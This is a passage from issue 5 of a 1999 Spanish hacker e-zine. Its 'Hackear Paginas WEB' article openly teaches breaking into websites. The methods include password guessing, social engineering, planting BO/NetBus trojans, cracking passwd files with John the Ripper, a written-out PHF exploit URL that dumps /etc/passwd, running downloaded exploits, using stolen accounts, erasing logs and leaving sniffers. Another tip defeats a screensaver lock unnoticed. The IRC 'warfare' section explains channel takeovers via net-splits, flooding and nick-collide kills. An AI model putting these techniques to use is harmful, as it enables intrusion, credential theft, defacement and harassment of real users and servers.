zed5:(zed5.txt):20/01/1999 << Back To zed5

************************************************************ * http://www.angelfire.com/ak/HACKZED/ZED2.html * ************************************************************ ------------- |---------| |-----\ |______ / | | | \ / / | |-----| | \ / / | | | \ / / | ---| | |--| | / / | ---| | |--| | / / | |-----| | | / ------- \ | | | / |_____________| | | | / |---------| |------/ ************************************************************ * http://www.angelfire.com/ak/HACKZED/ZED2.html * ************************************************************ |--------| |--------| ----------- *** |\ |---||--------| | | | | |____ /|---|| \ | || | | ----| | ----| / / | || | | || ----| | | | | / / | || | | || | | |--| | |--| / / | || | / || |--| | --| --------- | --| / / | || |/ || --| | | /_________\ | | / / | || |\ || | | ----| | ----| / / | || | \ || -----| | | | |/ --------\ || | \ || | |--------| |--------||_____________|- || | ---||---------| ************************************************************ * http://www.angelfire.com/ak/HACKZED/ZED2.html * ************************************************************ ZeD-wOrLd-EzInE numero 5 colaboradores de este numero: CheVara----------------->www.geocities.com/SiliconValley/Peaks/7837 DrCyBeR----------------->http://personales.mundivia.es/pedroj52 Roman Soft-------------->http://www.esi.us.es/~roman/tacticas.html saludos desde este e-zine a: la lista RAREDUDEZZ (de raregazz) a todos los miembros del HaCk`S-wEb-RiNg (http://come.to/HaCkS-wEb-RiNg) a guybrush (de raregazz--http://raregazz.acapulco.uagro.mx) por publicar ese articulo en tu e-zine a la gente de jjf-hackers team (http://www.jjf.org/) (felicidades,el nuevo aspecto de la web esta muy currado) y a toda la gente que colabora y lee este e-zine si me olvido de alguien,por favor que me perdone,pero mi memoria...(tendre que aumentar la ram) distribuidores oficiales del e-zine: http://www.angelfire.com/ak/HACKZED/ZED2.html---->puntero http://come.to/HaCkS-wEb-RiNg http://personales.mundivia.es/pedroj52 http://surf.to/zs si quieres colaborar con el e-zine,mandame tu articulo en formato TXT a zed@mixmail.com algunos de los textos que aqui se ponen,han sido copiados de webs u otros sitios pero siempre se respeta el contenido original de los autores y se pone la fuente de donde han salido.si algun texto es tuyo y no quieres que figure en este e-zine,dimelo y lo quitare de la edicion. ∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩ sumario de este numero: ∩ 1.Editorial (editor) ∩ 2.Ampliacion del texto Como trucar el win2 95/98 (ZeD) ∩ 3.Como hackear paginas web (CheVara) ∩ 4.Tacticas de guerra en el IRC/actualizacion 04/01/99 ∩ (Roman Soft/LLFB) 5.Una introduccion basica al hacking y al underground (stain) ∩ 6.Decodificacion de sistemas Nagra Vision (canal+) (ZeD) ∩ 7.Tercera parte del curso de antivirus ∩ 8.Noticias ∩ 9.Despedida y cierre ∩ ∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩∩ ((((((((((((((ZeD-wOrLd-EzInE numero 5))))))))))))))))))))))))))))))))))))))))))))))))))))))))) ---------------- 1. 3╨1T0«1Σú | ---------------- Bueno en primer lugar,!!!FELIZ NAVIDAD Y PROSPERO 1999 PARA LOS LECTORES DEL E-ZINEííí. En estas fechas tan se±aladas como son las navidades,en las que si no todos,la mayoria teneis alguna clase de vacaciones,ya sea por la escuela,en el trabajo....etc.... ┐que mejor que entrar al irc un rato a charlar con los colegas,aprender a hacer cosas nuevas entrar en ese sitio que se te resiste o ponerte a leer cualquiera de los e-zines que se publican por estas fechas?,pues nada,claro esta y por eso de este temprano numero del ZeD-wOrLd-EzInE,los que ya lleveis tiempo siguiendolo abreis notado que esta vez a tardado poco en salir,pero me sentia obligado a hacerlo,mas que nada para felicitar a todos los lectores asiduos o no tan asiduos a este vuestro e-zine. Pues lo dicho que el frio aprieta y estareis impacientes por comenzar a activar los microprocesadores que todos llevamos dentro (para quien no lo aya pillado,me refiero a las neuronas :D) -=ZeD=- ((((((((((((((ZeD-wOrLd-EzInE numero 5))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 2. Como trucar el jodio Win2 95/98 Para no aumentar demasiado el tama±o de este numero e decidido poner solo los nuevos trucos que he descubierto (son para el win12 98). Si alguno de vosotros quereis el texto completo podeis pedirmelo a: zed@mixmail.com ***************************************************comienza el texto*************************** Si os aveis dado cuenta el windows 98 no es mas que el 95 con la actualzacion del escritorio que os ofrece el Internet Explorer 4.0 y poco mas,este truco no lo he probado en este sistema con la actualizacion del escritorio,osea que si alguien lo prueba y le funciona que me lo diga. El truco en cuestion es para que quede + "fonito" el aspecto de las carpetas,el navegador,el programa de correo...en fin casi todo que abra una ventana del Gⁿin2. Vete al regedit (c:\windows) abrelo y haz lo siguiente: dirijete a HKEY_CURRENT_USER una vez alli dirijete a software,┐ya? pues ahora vete a Micro$oft ahora a Toolbar una vez que estes aqui crea una nueva cadena con el nombre de BackBitmap clikea dos veces sobre esta y asignale el nombre de un BMP (no vale otro formato) que tengas en la carpeta de windows (para empezar recomiendo Nubes.bmp u otro que se asemeje) dale a aceptar y todo eso,reinicia el ordenador y abre c:\ ya veras como mola ;-O El siguiente truco es para saltarse el protector de pantalla cuando este este activado desde el inicio,si se quiere acceder al Pc en cuestion solo hay que hacer lo siguiente: reinicia el PC y en el momento en que entras al win2 manten pulsada la tecla sift asta que termine de cargar,este metodo es bastante util,ya que al no tener que borrar el acceso a el nadie se dara cuenta que hemos accedido al PC ;-) pues esto es todo (de momento) si alguien tiene algun otro truco,que me lo mande a zed@mixmail.com ((((((((((((((ZeD-wOrLd-EzInE numero 5))))))))))))))))))))))))))))))))))))))))))))))))))))))))) Hackear Paginas WEB: * Introducci≤n * Diferencias en los tipos de WEB * Obteniendo Passwords en el tipo A. * Obteniendo Passwords en el tipo B. * Precauciones. * Sobre el autor 1║ INTRODUCI╙N El objetivo de este documento es el dar a conocer posibles formas de alteraci≤n del contenido de una pßgina WEB por personal no autorizado a ello ( llamΘmoslo hacking ;)). No me hago responsable del uso que se pueda hacer de este documento, pues su ·nica finalidad es la de informar, y el que lo use para otra cosa... lo hace bajo SU entera responsabilidad... ┐ Queda claro ?, si no te parece bien deja de leer y borra el fichero de tu HD ( disco duro para los muy novatos...). Las cosas que se describen en este fichero no te aseguran Θxito seguro, probablemente en la mayorφa de los casos solo te sirvan para empezar, teniendo que improvisar tu, pero prometo que este doc. serß mejor que los que he visto sobre el tema en Internet. El nivel de este documento es bßsico, pues no intenta ense±ar todo en un dia, mas que nada saber como empezar a hacer algo digamos "util". Nota: A pesar de que podras hacer todo lo que aquφ pone desde Windows 95 o 98, te recomiendo que pruebes algun Linux (aunque sea el Trinux, que cabe en 3 disketes x┤PPP (www.trinux.org)). Este documento esta escrito en WORD pk lo tiene todo cristo ( jeje casi todos ilegal para que se joda Microsoft (con perdon)). 2║ DIFERENCIAS ENTRE TIPOS DE WEBs Creo que para que nos entendamos mejor, es importante distinguir entre dos clases de WEBs, las webs personales, que pueden ser modificadas por el usuario propietario mediante su clave (tipo Geocities, Xoom y los proveedores de acceso a Inet que ofrecen espacio WEB). El segundo tipo, serian aquellas WEBs, llamemoslas "principales" de un servidor, que solo pueden ser modificadas por usuarios con muy altos privilegios (llamemosles "root" o "administrador"). Pues que bien ┐no?, y esta diferenciaci≤n tan chorra... ┐para que vale?... pues la utilizaremos para diferenciar las formas de hacernos con los passwords que nos dejan modificarlas... evidentemente no es igual de facil conseguir ser root en un server que tener una cuenta de usuario... asi que para esto es la diferenciaci≤n. 3║ OBTENIENDO PASSWORDS DE TIPO A (USUARIO): Estos passwords de usuarios, generalmente no muy cualificados, se caracterizan por ser muy chorras, osea faciles de recordar, repetidos con los passwords de otras cosas... asi que si la persona propietaria de las WEB es alguien cercano a ti, puedes empezar provando algunas palabras que te puedan parecer "interesantes" ( nombre del perro, mujer, hijos, fecha de nacimiento, lugar de residencia...), pero tampoco te mates mucho provando pues esto es perder el tiempo muchas veces, asi que si a los 10 o 11 intentos ( seg·n tu paciencia ) no sale nada, mejor dejes esta forma ;) Pero tambiΘn seria una buena idea intentar sacar el password a la "victima" a traves de enga±os y demas ( lo llaman ingenieria social...), por ejemplo puedes ligarte al tio/a y conseguir que te diga su pass... o tambien puedes intentar meterle un troyano tipo BO o NETBUS, que te permitiran sacarle las pass, evidentemente no voy a contar aquφ lo que le tienes que decir a la victima para que te crea... eso tendras que currelarlo tu un pokito Ademas, si conseguimos el fichero de passwords del servidor... ííEstamos de suerte!! Pues generalmente los passwords de usuario son bastante fßciles de crackear... solo elige el usuario y pon el john the ripper a trabajar ( el john es uno de los programas de cracking de ficheros PASSWD de UNIX mas conocidos, puedes conseguirlo en www.geocities.com/SiliconValley/Peaks/7837 , si no sabes usarlo... DON┤T WORRY, trae ayuda...) Pero probablemente el problema no sea el uso del John, sino el conseguir el fichero PASSWD, asi que para eso vamos al siguiente apartado de este cursillo. 3║ OBTENIENDO PASSWORDS DE TIPO B (root): Normalmente los administradores de los servidores no se chupan el dedo, asi que conseguir el fichero o el root directamente a traves de un exploit ( programa que se aprovecha de un BUG o agujero en el sistema operativo) no sea una tarea facil. Lo primero que puedes intentar es pillar el passwd por el FTP... y cuando eso no te haya funcionado probar el PHF ( escribir la siguiente linea en tu navegador: http://www.host.com/cgi-bin/phf?Qalias=%0a/bin/cat%20/etc/passwd , donde host.com es el nombre del servidor...), si el phf funcionase ( en estos tiempos ya suele estar parcheado en casi todos los servidores, asi que si no te sirve no te deprimas), tendrias en tu pantalla el fichero passwd, pero antes de alegrarte fijate en algo, si aparece: root:*:0:0:Charlie &:/root:/bin/csh ( un asterisco (*) detrßs del nombre "root" y los dos puntos, tambiΘn puede aparecer una equis (x)...), querra decir que el fichero esta shadow osea que aparte del PASSWD necesitas otro archivo... el SHADOW, puedes intentar sacarlo con PHF cambiando la palabra passwd del final de la linea del PHF por la palabra shadow ( para ser un poco mas explicito puedes jugar con el phf, cambiando de directorio... supongo que te estaras dando cuenta de c≤mo y si no, hay va una pista... "etc" es el nombre de un directorio ). Buiino, si lo anterior no ha funcionado, no te preocupes, a·n tenemos mas bazas que jugar. Si por cualquier casualidad de la vida posees una cuenta de usuario en el servidor, puedes intentar hacerte con el passwd ( y con el shadow si hace falta) a traves de telnet ( prueba con cat o more , para ver si Dios es tu amigo y puedes editar los archivos...) o, puedes enterarte del Sistema operativo que usa el server, version ... (enterate tambiΘn de la version del STMP, FTP ...) y vete a buscar exploits ( ya explique antes lo que son exploits...) Una vez que lo/s tengas pues... los pruebas!!! ┐Sino para que co±o los has cojido?... para provarlos, primero tendras que compilarlos ( ojo, hay sploits que no hay que compilar, pues simplemente consisten en teclear unos comandos o algo asi... jeje si tienes algo de esperiencia seguro que recuerdas algunos viejos compa±eros ;) ). Un buen sitio para pillar exploits es: http://www.rootshell.com/ ┐ Y donde los compilo ?, pues o el propio server ( con gcc ) o en otro con el mismo SO, ojo no puedes compilar exploits para un SUN en un linux Red Hat ... una vez que lo tengas compilado lo ejecutas... y a íjugar! Despues de todo esto, y otro poco por tu parte seguramente ya tengas root en algun peque±o server para provar... (recuerda si no tienes mucha soltura... empieza por china o por alli lejotes... que si te pillan no se meteran mucho contigo ┐verdad?). 4║ PRECAUCIONES Pues eso... procura no usar cuentas verdaderas para conectar ( aunque piensa que si dejas huellas... los marrones seran pal due±o de la cuenta, y eso no esta bien..., asi que cuidado con las cuentas de internet robadas, solo usar las que sepais que el due±o es un verdadero hijoputa o algo asi... o mejor si usas servidores "intermedios" o borras las huellas con algun zapper ( si lo usas sastamente como un exploit)... ahh, si te kurrelas un root y tal, pues deja algun sniffer y eso para recoger la cosecha... ( mas ke na no desperdiciar kurro ya hecho) 5║ SOBRE EL AUTOR Pues el capullo que escribe todo esto es CHEvARA, individuo que podreis encontrar en el IRC hispano por #scripting, #hack o #comunistas, cuya WEB por si quieres verla es: www.geocities.com/SiliconValley/Peaks/7837 y e-mail por si tenes algo que comentar: chevara@hotmail.com . Me he decidido a escribir esto simplemente porque ley un doc sobre el tema tan malo que me dije... por muy mal que lo haga yo seguro que queda algo mas "util", y aquφ esta, espero que a alguien le sirva de algo... CopyRight by CHEvARA ┤98 Saludos para todos mis colegas del IRC y para los demas miembros de GHT. Si quieres poner este doc. en una web o FTP, por favor avisame ( no pedir permiso, sino avisar para que me haga ilu y me emociones y todo eso ... x┤P ) ((((((((((((((ZeD-wOrLd-EzInE numero 5))))))))))))))))))))))))))))))))))))))))))))))))))))))))) TACTICAS DE GUERRA EN EL IRC/NUEVA ACTUALIZACION DEL TEXTO-->04/01/99 BY: Roman Soft/LLFB _______________________________________________________________________________________________ (c) RoMaN SoFt / LLFB, 1998 La distribuci≤n de este documento es "libre", con la ·nica condici≤n de informar al autor en caso de subirlo a alg·n ftp site o pßgina web, y siempre que no sea con fines comerciales ni reporte beneficio econ≤mico alguno. Las mismas restricciones se aplican a cualquier otra forma de difusi≤n p·blica (revistas, news, Θtc). En el caso de publicaciones (revistas) Θsta deberß ser completamente gratis. El documento debe ser distribuido de forma φntegra, no estß permitida la modificaci≤n total o parcial ni la difusi≤n de partes aisladas del mismo. En caso de incumplimiento se emprenderß las acciones legales pertinentes. Contactar con el autor para cualquier otra modalidad o forma de difusi≤n. ############################################################################################### 0.- Contenido. 1.- Introducci≤n. 2.- Principios. 2.1.- C≤mo funciona una red IRC. 2.2.- Conseguir op sin que nadie te lo de. 2.3.- Otras formas de conseguir op. 2.4.- Bot de servicio. 3.- Ataques. 3.1.- Flood. 3.2.- Nick collide. 3.2.1.- Split server collide. 3.2.2.- Lag collide. 3.3.- Nuke. 3.3.1.- ICMP nuke. 3.3.2.- OOB nuke. 3.4.- Ping. 3.4.1.- Ping of death. 3.5.- Ssping. 3.6.- Teardrop. 3.7.- Land. 3.8.- Teardrop modificado. 3.9.- Smurf. 3.10.- Bonk (/Boink). 3.11.- Syndrop. 3.12.- Overdrop. 3.13.- Nestea (/Nestea2). 3.14.- Trojans. 3.14.1.- Mirc.ini. 3.14.2.- Dmsetup.exe. 3.14.3.- Back Orifice. 3.14.4.- NetBus. 3.15.- Hanson. 3.16.- Modem DoS. 3.16.1.- /Msg ComX. 3.16.2.- +++ATH0. 4.- Spoofing. 5.- TΘcnicas avanzadas. 5.1.- Bouncing. 5.2.- Wingate. 5.3.- DNS Inject. 5.4.- Recursos compartidos. 6.- Defensa. 6.1.- Firewall. 7.- Resources. 8.- Feedback (FAQ). 9.- Agradecimientos. 10.- Modificaciones. 11.- Notas finales. 1.- Introducci≤n. Ultimamente la guerra en el IRC es, por desgracia, algo bastante com·n. Conviene, a lo menos, estar informado de las distintas tΘcnicas que se suelen usar para "luchar", aunque sea simplemente para detectar que te estßn atacando, saber c≤mo lo estßn haciendo e intentar defendernos. No es mi intenci≤n profundizar demasiado en el tema aunque intentarΘ detallar algunos puntos que considere convenientes. Todo lo que aquφ se hable es extensible en general a cualquier red IRC. No obstante en algunos casos muy particulares me referirΘ a la red IRC hispana ("*.irc-hispano.org"). Ni que decir tiene que la informaci≤n que se proporciona aquφ es con fines educativos; en ning·n caso debe ser usada salvo en circunstancias excepcionalmente justificadas. Un uso abusivo puede significar una k/g-line totalmente merecida. Yo no me hago responsable de un posible mal uso de esta info. 2.- Principios. Muchas veces el objetivo de un ataque no es otra cosa que hacerse con un canal ("tomarlo"). Esto es relativamente fßcil y hay diversas tΘcnicas para ello. El objetivo es hacerse con el op en el canal. Los medios: tu inteligencia y astucia... ;-) 2.1.- C≤mo funciona una red IRC.- El servidor de IRC propiamente dicho no es mßs que un programa corriendo en background (un daemon) en una mßquina determinada (en Unix correrφa el "ircd"). Los usuarios se conectan a dicha mßquina y acceden al servidor en forma de clientes. Una red IRC se compone de varios servidores corriendo en paralelo y enlazados entre ellos, de forma que se mantegan comunicados (puedan intercambiar mensajes entre ellos). Cuando un usuario se conecta a un servidor determinado, Θste (el servidor) lo notifica a los demßs servidores que forman parte de la red IRC. Igualmente, cualquier otra acci≤n es notificada a todos los servidores, de forma que Θstos actuan como una unidad. De esta forma el usuario se deja ver en todos los servidores aunque fφsicamente s≤lo estΘ conectado a uno. Esto permite tener muchos usuarios repartidos por diferentes servidores pero que virtualmente es como si estuvieran todos en uno s≤lo. La estructura de la red IRC es en forma de ßrbol (es decir, no puede haber bucles, o "caminos cerrados": partiendo de un nodo no se llegue por ning·n camino otra vez a dicho nodo) aunque un tanto especial: cada nodo se ve a sφ mismo como el nodo raiz de la red y tiene un grafo en forma de ßrbol que le indica el camino a seguir para alcanzar cada uno de los restantes nodos. En la "literatura" esto se conoce como "spanning tree", que podrφamos traducir como "ßrbol de expansi≤n". Esto quiere decir que en un momento determinado un nodo cualquiera tendrß almacenada informaci≤n para alcanzar cada uno de los otros nodos de forma unφvoca (tiene un ·nico camino posible hacia cada nodo). Esa informaci≤n serφa el ßrbol que estß usando el nodo en cuesti≤n. Pero ademßs este ßrbol puede ser distinto para el mismo nodo en un instante diferente, es decir, puede cambiar (digamos que el nodo va reconfigurßndose). Esto tiene la ventaja de que permite adaptarse a posibles variaciones (eventuales) de la topologφa de la red (asφ, si un nodo cae, los restantes nodos lo detectarßn y se reconfigurarßn de forma que los caminos que antes pasaban por dicho nodo dejen de hacerlo: se tomarφan caminos alternativos con lo cual la red seguirφa funcionando correctamente a pesar de la caida del nodo). Un ejemplo de topologφa de red podrφa ser: [ Server 15 ] [ Server 13 ] [ Server 14] / \ / / \ / [ Server 11 ] ------ [ Server 1 ] [ Server 12] / \ / / \ / [ Server 2 ] [ Server 3 ] / \ \ / \ \ [ Server 4 ] [ Server 5 ] [ Server 6 ] / | \ / / | \ / / | \______ / / | \ / [ Server 7 ] [ Server 8 ] [ Server 9 ] [ Server 10 ] : [ etc. ] : El paso de un nodo a otro adyacente se conoce como "hop" (salto). Asφ para alcanzar el nodo 5 partiendo de 4 tendremos que dar 2 saltos (hops): uno de 4 a 2 y otro de 2 a 5. Podemos visualizar el ßrbol que estß usando el server al que estamos conectados usando el comando "/links". Este sacarß un listado por pantalla de los servidores alcanzables desde el nuestro, de forma jerarquizada, es decir, respetando la estructura del ßrbol. Normalmente se indica entre parΘntesis al lado de cada servidor el n·mero de hops que habrφa que dar para alcanzar cada uno de los nodos partiendo del nuestro. Cuando se rompe uno de los eslabones (links) que unen 2 servidores el conjunto se divide en 2 subconjuntos, los cuales intentarßn seguir funcionando normalmente aunque de forma aislada. Esto es, cada subconjunto permanece operativo y mantiene la comunicaci≤n entre los servers pertenecientes a dicho subconjunto. Pero por razones obvias los servidores de un subconjunto no ven a los del otro y viceversa. Esta situaci≤n se conoce como net-split. En una sesi≤n normal de IRC esto lo verφamos: [1:23] *** Case_Zer0 has quit IRC (fuego.irc-hispano.org io.irc-hispano.org) Esto indica que se han spliteado los dos servidores indicados entre parΘntesis y que a consecuencia de ello el usuario Case_Zer0 [ hi Case ;-) ] ha salido "de nuestra red IRC" (lo que estß ocurriendo es que se encuentra en el otro subconjunto de servidores: a todos los efectos es que como si se encontrase ya en otra red IRC). Cuando el enlace caido se recupera (i.e. se reestablece la comunicaci≤n entre los servers spliteados) se habla de net-merge. Esto se verφa en la sesi≤n anterior como un "join" por parte del usuario que estaba en el servidor spliteado (tanto el quit como el join anteriores son mecanismos del propio IRC, es decir, el usuario anterior no dio ninguna orden de quit ni de join, es transparente a dicho usuario). Hay programas que detectan y avisan cuando se produce alg·n net-split o net-merge: son los denominados "link-lookers", y su utilidad es bastante obvia. Por ejemplo, si el enlace dibujado en rojo (enlace server 2 <-> server 5) cayera, el servidor 5 estarφa aislado de la red. Los usuarios de dicho servidor dejarφan de ver a todos los demßs pertenecientes a servidores distintos, y al contrario. Se dice que el servidor 5 estß spliteado. Es fßcil reconocer a un servidor en esta situaci≤n: si entras en una red a travΘs de un determinado servidor y te encuentras a muy poca gente es muy normal que se deba a que estß spliteado de la red. Otra posibilidad es que el enlace azul (3 <-> 12) cayera. En este caso el servidor 12 se splitea de la red, pero tambiΘn lo hacen los servidores 13 y 14 indirectamente, por conectarse a travΘs del primero. Para una informaci≤n completa del funcionamiento y estructura de una red IRC, y del protocolo subyacente ("Internet Relay Chat Protocol") os remito al RFC1459 . 2.2.- Conseguir op sin que nadie te lo de.- Cuando alguien se une a un canal donde no hay nadie (hace un /join #canal) el servidor supone que se trata de un nuevo canal y le da op a dicho usuario. Se dice que ha creado un canal. Vamos a aprovechar esto para hacernos con el op en un canal ya existente. ┐C≤mo? Fßcil: solo hay que aprovechar un net-split. Los pasos serφan los siguientes: - Esperar un split (lo podemos detectar con un link-looker). - Entrar (conectar) al servidor spliteado. - /join #canal (donde canal es el canal donde queremos conseguir op). - El server crearß un nuevo canal y tendrßs el op. - Esperar a que se deshaga el split. Si "hay suerte" (leer mßs abajo), al deshacerse el split conservaremos el op en los restantes servidores (el servidor spliteado se encarga de dar las ≤rdenes correspondientes). Entonces se dice que hemos llevado a cabo un "net-hack". Los usuarios presentes en el canal en el que hemos llevado a cabo la acci≤n verßn algo como: [1:41] *** irc.i3d.es sets mode: +o RoMaNSoFt (donde el servidor que nos da op es el que antes estaba spliteado). Esto no siempre funcionarß porque hay aspectos que todavφa no he comentado. Paso a explicar el procedimiento y comentar algunos puntos negros. Supongo que habrΘis comprendido el procedimiento; es muy simple: aprovechar que el servidor spliteado no ve a los usuarios de otros servidores y por tanto al canal previamente creado. Esto presupone que no hay usuarios del servidor spliteado en el canal (en este caso no funcionarφa) ya que al entrar nosotros por el server spliteado verφamos al canal como ya creado, con los usuarios de nuestro mismo servidor (a los otros los "esconde" el split) y por tanto el server no nos darß el op, como es habitual al entrar en cualquier canal ya existente. TambiΘn hay que tener en cuenta que actualmente todos los servidores tienen protecciones anti-nethack. En este caso, al deshacerse el split, los restantes servidores te quitarßn el op a tφ en vez de ser al contrario (imponer tu op en los restantes servers), protegiendo al canal PERO Θsto lo harßn ·nicamente en caso de que ya hubiera ops en el canal antes de tu intento de net-hack (aunque hay veces en que el server se equivoca y mantiene tu op, quitßndoselo a los demßs). Es decir, que el net-hack funcionarß s≤lo para canales donde no haya op ("opless channels"). Por esta raz≤n, si queremos el op, necesitaremos tirar previamente a los ops (echarlos del canal, de forma que pierdan su op) para luego llevar a cabo el net-hack. ┐C≤mo tirarlos? De esto nos encargaremos mßs adelante, sigue leyendo };-) 2.3.- Otras formas de conseguir op.- La otra alternativa para conseguir el op es que alguien te lo de ;-) . Puede ser un op del canal o un irc-op de la red, aunque para esto ·ltimo tendrßs que dar una justificaci≤n convincente (como por ejemplo que os acaban de tomar el canal, alguien os ha atacado, Θtc). Para la primera alternativa entra en juego tu "don de la palabra": trata de hacerte amigo de alg·n op para que Θste te lo pase. En ese momento ya estßs capacitado para quitarle el op a todos los demßs ("mass-deop") y quedarte con el canal. Esto lo hacen automßticamente muchos scripts ("automatic-deop"): nada mßs darte el op el script automßticamente deopea a todos los ops (excepto a tφ, claro). 2.4.- Bot de servicio.- Se trata de un "usuario" muy especial... un robot que se encarga entre otras cosas de proteger los canales. En la red hispana se llama Scytale (en CobraNet, por ejemplo, es KingCobra) y estß dentro de muchos canales (registrados). Normalmente suele tener op, con lo cual el canal deja de ser opless y se evita el net-hack :-( Suele tener ircop-status [channel-service status] y ademßs tiene otras funciones en las que no pienso entrar. Resumiendo: si hay bot, nuestro gozo a un pozo. 3.- Ataques. En esta secci≤n entraremos en materia... }:-) Nuestro objetivo: tirar a alguien del server irc. 3.1.- Flood.- Los servidores IRC tienen que controlar el trßfico de entrada (el que proviene del exterior) para evitar su congesti≤n. Una de las formas de conseguirlo es no permitir que un cliente le mande mßs de una determinada cantidad de informaci≤n en un peque±o intervalo de tiempo; o lo que es lo mismo: la velocidad con que un cliente puede enviar datos al servidor estß limitada. Cuando un cliente supera el lφmite preestablecido por el servidor, Θste cierra la conexi≤n con el cliente: lo echa del servidor porque no puede soportar tanto caudal de entrada. El servidor lo "explica" asφ: [1:59] *** _^TkLaS^_ has quit IRC (Excess Flood) Un flood, en general, no es otra cosa que mandar mucha informaci≤n en poco tiempo a alguien para intentar que se sature. Se puede floodear una direcci≤n IP, ..., o lo que ahora nos concierne: un servidor de IRC. La manera de aprovechar el flood en nuestro favor consiste en mandar muchas peticiones de informaci≤n a nuestra vφctima, de forma que Θsta, al contestar, supere el lφmite del servidor y Θste lo eche. Por ejemplo, si le mandamos muchos /ctcp version's seguidos (requiriendo informaci≤n sobre el programa cliente que estß utilizando) la vφctima floodearß al servidor cuando conteste porque mandarß muchas veces (tantas como peticiones haya habido) el texto de respuesta al servidor (para que del servidor vaya al cliente que peticion≤, i.e., al atacante). En esto del flood juega un papel muy importante el n·mero de peticiones que se reciben en un peque±o intervalo de tiempo. Cuantas mßs se reciban, mßs posibilidades hay de que el flood tenga Θxito. Por ello no es ninguna tonterφa mandar peticiones desde varios puntos a la vez, y no desde uno s≤lo, es decir, varios usuarios (íque podrφan ser una misma persona!) de la red IRC manden peticiones a la vφctima todos a la vez en un determinado momento. Si los usuarios (nicks) corresponden a una misma persona (una misma direcci≤n IP) se habla de clones. Por tanto, una posible forma de ataque serφa crearnos muchos clones y peticionar a la vez desde todos ellos a la vφctima. Pero los servidores tambiΘn suelen estar preparados para evitar muchos clones (cada clone ocupa, por decirlo de alguna manera, una "linea" de entrada al servidor, y esto consume recursos del mismo). Suele haber un mßximo permitido (en el irc hispano es 2) denegßndosele el acceso a la red a un tercer clone, o en caso de que Θste lo consiguiese expulsßndosele del servidor ("matßndolo") (el programa servidor revisa peri≤dicamente las IP's conectadas y detecta cuando hay varios usuarios con una misma direcci≤n IP): [1:32] *** _^Virus^_ has quit IRC (Killed (Clones!)) Se puede cambiar el n·mero mßximo de clones admisibles desde una determinada direcci≤n IP o dominio a±adiendo una I-Line al servidor IRC (en caso de no existir I-Line para esa direcci≤n IP en particular se usa el mßximo genΘrico definido). Esto lo debe hacer alg·n administrador de la red IRC y es lo que habitualmente se usa para dar acceso a entidades con muchos ordenadores accediendo a Internet desde una misma IP (como es el caso de la mayorφa de cyber-cafΘs). ┐C≤mo provocar un flood con mßs de 2 clones entonces? La respuesta es simple: en principio no se puede. ┐Entonces? Pues la soluci≤n es que varias personas distintas se pongan de acuerdo para atacar a la vez a la vφctima. Cada persona podrφa tener a su vez varios clones. Por ejemplo, si A (atacante) quiere atacar a V (vφctima), A se pone de acuerdo con B y C (otras 2 personas atacantes). A su vez supongamos que cada atacante tiene 2 clones: i.1 e i.2 (donde i=A,B,C). Entonces tendremos 6 usuarios (conexiones IRC) distintos atacando a V, que serφan A.1, A.2, B.1, B.2, C.1 y C.2. Pero hay un problema: ┐c≤mo sincronizarse para atacar? ┐C≤mo "ponerse de acuerdo" para mandar las peticiones en un determinado momento? Para esto existe lo que se denomina "floodnet" que, como habrß adivinado nuestro ßvido lector, es una "red" (asociaci≤n) de gente cuyo ·nico objetivo es floodear a alguien. La ventaja que tiene es que la sincronizaci≤n entre los distintos componentes de la floodnet es automßtica (lo hacen los scripts) lo cual resuelve el problema anterior. TambiΘn existe lo que se denomina "botnet" y que es anßlogo a la floodnet pero usando bots (no confundir con los "de servicio"; estos ·ltimos los ponen los servers de la red irc y no los usuarios) los cuales serßn lanzados desde alguna shell Unix (intΘrprete de comandos en una mßquina Unix). Los bots suelen estar prohibidos y cuando se detectan, a lo menos, son expulsados: [1:32] *** Viernes13 has quit IRC (Killed (You are not welcome to this network!)) Hoy en dφa tanto los programas clientes de IRC como los scripts implementan protecciones anti-flood que dificultan enormemente el Θxito de un ataque de tipo flood. Por ejemplo, cuando detectan varias peticiones seguidas mandan las respuestas espaciadas en el tiempo (con pausas) y no inmediatamente, con lo cual se evita el flood. TambiΘn hay tΘcnicas de flood bastante optimizadas (por ejemplo, usando una floodnet) aunque en general un ataque flood no suele ser demasiado eficiente y es mßs costoso lograr su Θxito que con algunas de las tΘcnicas que se describen a continuaci≤n. 3.2.- Nick collide.- Un "nick collide" ocurre cuando dos personas tienen un mismo nick. En principio esto no deberφa ser posible (el servidor no deja usar un nick que ya estß en uso) pero hay dos situaciones en las que podrφa darse el caso y que se describen en los dos puntos siguientes. El resultado de un nick collide depende del servidor (ircd). En servidores antiguos (sin protecci≤n) el collide se resuelve matando a los dos usuarios con mismo nick (íambos!). En otros mßs inteligentes (con protecci≤n) el servidor guarda informaci≤n acerca de los usuarios y puede saber que usuario tiene el nick con mayor antigⁿedad (i.e. quiΘn se lo puso antes), matando ·nicamente al usuario con el nick mßs reciente (protegiendo al usuario mßs "veterano"). 3.2.1.- Split server collide.- Se basa en aprovechar un net-split: - Esperar un split. - Entrar (conectar) al servidor spliteado. - Ponerse como nick el de la vφctima. - Esperar a que se deshaga el split. Si todo va bien (el servidor no tiene protecci≤n), a la vuelta del split se detectarß el collide y se matarßn tanto al atacante como a la vφctima. L≤gicamente nuestro usuario atacante serß un clone nuestro, con lo cual no pasa nada si es killeado. 3.2.2.- Lag collide.- Consiste en aprovechar el lag de un servidor, o lo que es lo mismo, el retraso en recibir los mensajes de otros servidores. Esta tΘcnica es mßs efectiva que la anterior, pues funciona en servidores con protecci≤n. Los pasos serφan los siguientes: - Meter un clone en el servidor lageado. - Esperar a que la vφctima cambie de nick (esto lo detectamos desde otro servidor no lageado). - Cambiar rßpidamente el nick de nuestro clone y ponerle el que se acaba de poner la vφctima (el nuevo). - Esperar al lag. ;) Lo que ocurre es que nuestra orden de cambiar el nick para nuestro clone llega antes al servidor (lageado) que la orden de cambio de nick de la vφctima debido a que nuestra orden va directamente de nuestro cliente al servidor lageado mientras que la otra va a travΘs de la red IRC (donde hemos supuesto que se introduce un lag notable). Esto hace que el servidor (lageado) tome a nuestro clone como "due±o" legφtimo del nick y mande un kill al otro (la vφctima). Esto 